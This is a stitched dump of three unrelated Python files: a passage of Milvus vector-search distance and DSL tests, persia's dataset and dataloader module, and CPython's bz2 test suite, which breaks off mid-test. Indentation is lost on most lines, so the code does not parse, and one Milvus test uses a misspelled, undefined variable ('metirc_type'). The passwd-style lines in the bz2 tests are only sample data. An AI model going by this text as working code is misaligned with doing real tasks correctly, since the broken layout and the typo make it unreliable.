entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
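    # Hedged note on the assertion above: np.sqrt is applied to the returned
    # distance before comparing against l2(), which implies the engine reports
    # squared L2 distances for this metric in these tests.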
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
        method: compare the returned distance with the value computed with the L2 metric
        expected: the returned distance equals the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(default_nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip(self, connect, collection):
"""
target: search collection, and check the result: distance
        method: compare the returned distance with the value computed with the Inner Product metric
        expected: the returned distance equals the computed value
"""
nq = 2
        metric_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
                                                metric_type=metric_type,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
        method: compare the returned distance with the value computed with the Inner Product metric
        expected: the returned distance equals the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
        metric_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
                                                metric_type=metric_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L0)
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with the Jaccard metric
        expected: the returned distance equals the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
"""
        target: search binary_collection with the L2 metric type
        method: search binary vectors while requesting the L2 metric
        expected: raise an exception because L2 is not supported for binary vectors
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, **query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with the Hamming metric
        expected: the returned distance equals the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="HAMMING")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: search with new random binary entities and the SUBSTRUCTURE metric type
        expected: the result is empty because the random queries are not substructures of the inserted vectors
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUBSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: search with query vectors generated as substructures of the inserted entities
        expected: each query matches the corresponding inserted entity with distance near zero
"""
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: search with new random binary entities and the SUPERSTRUCTURE metric type
        expected: the result is empty because the random queries are not superstructures of the inserted vectors
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUPERSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: search with query vectors generated as superstructures of the inserted entities
        expected: each query matches the inserted entities with distance near zero
"""
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with the Tanimoto metric
        expected: the returned distance equals the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="TANIMOTO")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
"""
        target: test concurrent search from multiple threads sharing a single connection
        method: search from 4 threads that all use the same connection
        expected: status ok and each search returns the inserted ids
"""
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, **default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, connect, args):
"""
        target: test search on multiple collections with the L2 metric
        method: add vectors into 10 collections, and search each of them
        expected: search status ok and the result length equals nq
"""
num = 10
top_k = 10
nq = 20
collection_names = []
for i in range(num):
collection = gen_unique_str(uid + str(i))
connect.create_collection(collection, default_fields)
collection_names.append(collection)
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
for i in range(num):
connect.drop_collection(collection_names[i])
class TestSearchDSL(object):
"""
******************************************************************
    # The following cases cover valid and invalid query expressions
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_query_vector_only(self, connect, collection):
"""
        target: test search normal scenario
        method: search with vectors only
        expected: search status ok; the result length equals default_top_k
"""
entities, ids = init_data(connect, collection)
connect.load_collection(collection)
res = connect.search(collection, **default_query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L0)
def test_query_empty(self, connect, collection):
"""
        target: test search with an empty query
        method: search with an empty query dict
        expected: error raised
"""
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
|
data.py
|
from threading import Thread
from typing import Optional
from torch.utils.data.dataset import IterableDataset as TorchIterableDataset
import persia.env as env
from persia.ctx import cnt_ctx
from persia.logger import get_default_logger
from persia.prelude import (
PyPersiaBatchDataChannel,
PyPersiaBatchDataReceiver,
PyPersiaBatchDataSender,
init_responder,
)
_logger = get_default_logger()
class IterableDataset(TorchIterableDataset):
r"""IterableChannelBase wrap the PyPersiaBatchDataChannel that provide the channel sender and
receiver.
Arguments:
buffer_size (int): PyPersiaBatchDataChannel buffer size
"""
def __init__(self, buffer_size: int):
self.persia_batch_channel = PyPersiaBatchDataChannel(buffer_size)
@property
def receiver(self) -> PyPersiaBatchDataReceiver:
"""Get PyPersiaBatchDataReceiver python wrapper"""
return self.persia_batch_channel.get_receiver()
@property
def sender(self) -> PyPersiaBatchDataSender:
"""Get PyPersiaBatchDataSender python wrapper"""
return self.persia_batch_channel.get_sender()
class StreamingDataset(IterableDataset):
r"""NatsStreamingChannel receive data from nats publisher
Arguments:
buffer_size (int): PyPersiaBatchDataChannel buffer size
"""
def __init__(
self,
buffer_size: int,
):
super(StreamingDataset, self).__init__(buffer_size)
self.initialized = False
def __iter__(self):
if not self.initialized:
world_size = env.get_world_size()
assert world_size != -1, "WORLD_SIZE not set"
init_responder(world_size, self.sender)
_logger.info("initialize the responder")
self.initialized = True
while True:
yield None
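# Hedged usage note (not part of the library source): StreamingDataset expects the
# WORLD_SIZE environment variable to be set (see the assertion in __iter__ above);
# the actual batches arrive through the nats responder, so iteration only yields
# placeholders that pace the Dataloder defined later in this module.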
class PersiaDataset(IterableDataset):
r"""Persia data channel that provide asynchronous data handler feature to improve the performance of data preprocess.
Not support synchronous data handler temporary.
Arguments:
buffer_size (int): PyPersiaBatchDataChannel buffer size
        async_iterator (bool, optional): launch a thread to generate the data asynchronously
"""
def __init__(
self,
buffer_size: int,
async_iterator: bool = True,
):
super(PersiaDataset, self).__init__(
buffer_size,
)
self.async_iterator = async_iterator
def fetch_data(self, sender: PyPersiaBatchDataSender):
"""Callback function to put the data into PyPersiaBatchDataSender
Arguments:
            sender (PyPersiaBatchDataSender): sender channel used to push the generated data
                to the PersiaBatchData receive channel
"""
raise NotImplementedError("implement this function to fetch data")
def __iter__(self):
if self.async_iterator:
handler = Thread(target=self.fetch_data, args=(self.sender,), daemon=True)
handler.start()
for _val in range(len(self)):
yield _val
if self.async_iterator:
handler.join()
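# --- Hedged usage sketch (not part of the persia source) ---------------------
# A minimal PersiaDataset subclass illustrating the intended extension points:
# implement ``fetch_data`` to push preprocessed batches through the sender and
# ``__len__`` so ``__iter__`` knows how many placeholders to yield.  The exact
# call used to hand a batch to ``PyPersiaBatchDataSender`` lives in
# persia.prelude and is not shown in this file, so it is left as a placeholder.
class _ExamplePersiaDataset(PersiaDataset):
    def __init__(self, batches, buffer_size: int = 10):
        super().__init__(buffer_size, async_iterator=True)
        self.batches = batches
    def __len__(self) -> int:
        return len(self.batches)
    def fetch_data(self, sender: PyPersiaBatchDataSender):
        for batch in self.batches:
            # Hand ``batch`` to ``sender`` here; the concrete sender method is
            # part of persia.prelude and is intentionally not guessed at.
            pass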
class Dataloder(object):
r"""Dataloder provide the interface to fetch the PythonBatchData from PyForward
wrapper.
Arguments:
dataset (IterableChannelBase): dataset for Dataloder to retrive replica info and sender channel
forward_buffer_size: (int, optional): gpu forward channel buffer size, this args effect the gpu memory cost
is_training (bool, optional): whether current forward status is training or not
timeout_ms (int, optional): timeout for PyForward to fetch data, millisecond unit
num_workers (int, optional): spawn thread worker number for PyForward to lookup embedding and PythonBatchData prefetch
reproducible (bool, optional): iterate the data in fixed order, make the dataflow deterministic
embedding_staleness (int, optional): max number of batched staleness embedding each rank. A staleness embedding means it prefetched from embedding server before gradient updated.
"""
def __init__(
self,
dataset: IterableDataset,
forward_buffer_size: int = 10,
is_training: bool = True,
timeout_ms: int = 1000 * 60 * 10,
num_workers: int = 10,
reproducible: bool = False,
embedding_staleness: Optional[int] = None,
):
        # dynamically import PyForward due to conditional compilation
from persia.prelude import PyForward
self.dataset = dataset
self.timeout_ms = timeout_ms
self.num_workers = num_workers
current_ctx = cnt_ctx()
        assert current_ctx is not None, "Current context is None!"
self.forward_engine = PyForward(
forward_buffer_size,
is_training,
reproducible,
embedding_staleness,
)
self.forward_engine.set_input_channel(dataset.receiver)
self.forward_engine.launch(self.num_workers)
def __iter__(self):
for _ in self.dataset:
try:
yield self.forward_engine.get_batch(self.timeout_ms)
except TimeoutError:
_logger.warn("get_batch time out, stop iter stream data")
break
def __len__(self):
return len(self.dataset)
def __del__(self):
self.forward_engine.shutdown()
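# --- Hedged end-to-end sketch (not part of the persia source) ----------------
# Assumes a persia training context has been entered so that cnt_ctx() is not
# None, and a PersiaDataset subclass such as _ExamplePersiaDataset above:
#
#   dataset = _ExamplePersiaDataset(batches, buffer_size=10)
#   loader = Dataloder(dataset, forward_buffer_size=10, is_training=True)
#   for batch in loader:
#       ...  # run the model forward/backward pass on ``batch``
#
# The forward engine is shut down in Dataloder.__del__ when the loader is dropped.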
|
test_bz2.py
|
from test import support
from test.support import bigmemtest, _4G
import unittest
from io import BytesIO, DEFAULT_BUFFER_SIZE
import os
import pickle
import glob
import tempfile
import pathlib
import random
import shutil
import subprocess
import threading
from test.support import unlink
import _compression
import sys
# Skip tests if the bz2 module doesn't exist.
bz2 = support.import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = None
def ext_decompress(data):
global has_cmdline_bunzip2
if has_cmdline_bunzip2 is None:
has_cmdline_bunzip2 = bool(shutil.which('bunzip2'))
if has_cmdline_bunzip2:
return subprocess.check_output(['bunzip2'], input=data)
else:
return bz2.decompress(data)
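# Hedged usage note: ext_decompress() acts as a decompression oracle that is
# independent of the module under test whenever an external ``bunzip2`` binary
# is available, e.g.:
#
#   assert ext_decompress(bz2.compress(b"data")) == b"data"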
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT_LINES = [
b'root:x:0:0:root:/root:/bin/bash\n',
b'bin:x:1:1:bin:/bin:\n',
b'daemon:x:2:2:daemon:/sbin:\n',
b'adm:x:3:4:adm:/var/adm:\n',
b'lp:x:4:7:lp:/var/spool/lpd:\n',
b'sync:x:5:0:sync:/sbin:/bin/sync\n',
b'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n',
b'halt:x:7:0:halt:/sbin:/sbin/halt\n',
b'mail:x:8:12:mail:/var/spool/mail:\n',
b'news:x:9:13:news:/var/spool/news:\n',
b'uucp:x:10:14:uucp:/var/spool/uucp:\n',
b'operator:x:11:0:operator:/root:\n',
b'games:x:12:100:games:/usr/games:\n',
b'gopher:x:13:30:gopher:/usr/lib/gopher-data:\n',
b'ftp:x:14:50:FTP User:/var/ftp:/bin/bash\n',
b'nobody:x:65534:65534:Nobody:/home:\n',
b'postfix:x:100:101:postfix:/var/spool/postfix:\n',
b'niemeyer:x:500:500::/home/niemeyer:/bin/bash\n',
b'postgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\n',
b'mysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\n',
b'www:x:103:104::/var/www:/bin/false\n',
]
TEXT = b''.join(TEXT_LINES)
DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
EMPTY_DATA = b'BZh9\x17rE8P\x90\x00\x00\x00\x00'
BAD_DATA = b'this is not a valid bzip2 file'
# Some tests need more than one block of uncompressed data. Since one block
# is at least 100,000 bytes, we gather some data dynamically and compress it.
# Note that this assumes that compression works correctly, so we cannot
# simply use the bigger test data for all tests.
test_size = 0
BIG_TEXT = bytearray(128*1024)
for fname in glob.glob(os.path.join(os.path.dirname(__file__), '*.py')):
with open(fname, 'rb') as fh:
test_size += fh.readinto(memoryview(BIG_TEXT)[test_size:])
if test_size > 128*1024:
break
BIG_DATA = bz2.compress(BIG_TEXT, compresslevel=1)
def setUp(self):
fd, self.filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
unlink(self.filename)
class BZ2FileTest(BaseTest):
"Test the BZ2File class."
def createTempFile(self, streams=1, suffix=b""):
with open(self.filename, "wb") as f:
f.write(self.DATA * streams)
f.write(suffix)
def testBadArgs(self):
self.assertRaises(TypeError, BZ2File, 123.456)
self.assertRaises(ValueError, BZ2File, os.devnull, "z")
self.assertRaises(ValueError, BZ2File, os.devnull, "rx")
self.assertRaises(ValueError, BZ2File, os.devnull, "rbt")
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=0)
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=10)
def testRead(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
def testReadBadFile(self):
self.createTempFile(streams=0, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertRaises(OSError, bz2f.read)
def testReadMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testReadMonkeyMultiStream(self):
# Test BZ2File.read() on a multi-stream archive where a stream
# boundary coincides with the end of the raw read buffer.
buffer_size = _compression.BUFFER_SIZE
_compression.BUFFER_SIZE = len(self.DATA)
try:
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
finally:
_compression.BUFFER_SIZE = buffer_size
def testReadTrailingJunk(self):
self.createTempFile(suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT)
def testReadMultiStreamTrailingJunk(self):
self.createTempFile(streams=5, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testRead0(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(0), b"")
def testReadChunk10(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
def testReadChunk10MultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT * 5)
def testRead100(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testPeek(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testReadInto(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
n = 128
b = bytearray(n)
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b, self.TEXT[:n])
n = len(self.TEXT) - n
b = bytearray(len(self.TEXT))
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b[:n], self.TEXT[-n:])
def testReadLine(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES:
self.assertEqual(bz2f.readline(), line)
def testReadLineMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES * 5:
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES)
def testReadLinesMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES * 5)
def testIterator(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES)
def testIteratorMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES * 5)
def testClosedIteratorDeadlock(self):
# Issue #3309: Iteration on a closed BZ2File should release the lock.
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, next, bz2f)
# This call will deadlock if the above call failed to release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testWrite(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
with BZ2File(self.filename, "w") as bz2f:
n = 0
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteNonDefaultCompressLevel(self):
expected = bz2.compress(self.TEXT, compresslevel=5)
with BZ2File(self.filename, "w", compresslevel=5) as bz2f:
bz2f.write(self.TEXT)
with open(self.filename, "rb") as f:
self.assertEqual(f.read(), expected)
def testWriteLines(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
bz2f.writelines(self.TEXT_LINES)
# Issue #1535500: Calling writelines() on a closed BZ2File
# should raise an exception.
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(b"abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(OSError, bz2f.write, b"a")
self.assertRaises(OSError, bz2f.writelines, [b"a"])
def testAppend(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with BZ2File(self.filename, "a") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT * 2)
def testSeekForward(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekForwardAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(len(self.TEXT) + 150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
readto = len(self.TEXT) + 100
while readto > 0:
readto -= len(bz2f.read(readto))
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[100-150:] + self.TEXT)
def testSeekBackwardsFromEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekBackwardsFromEndAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-1000, 2)
self.assertEqual(bz2f.read(), (self.TEXT * 2)[-1000:])
def testSeekPostEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwice(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
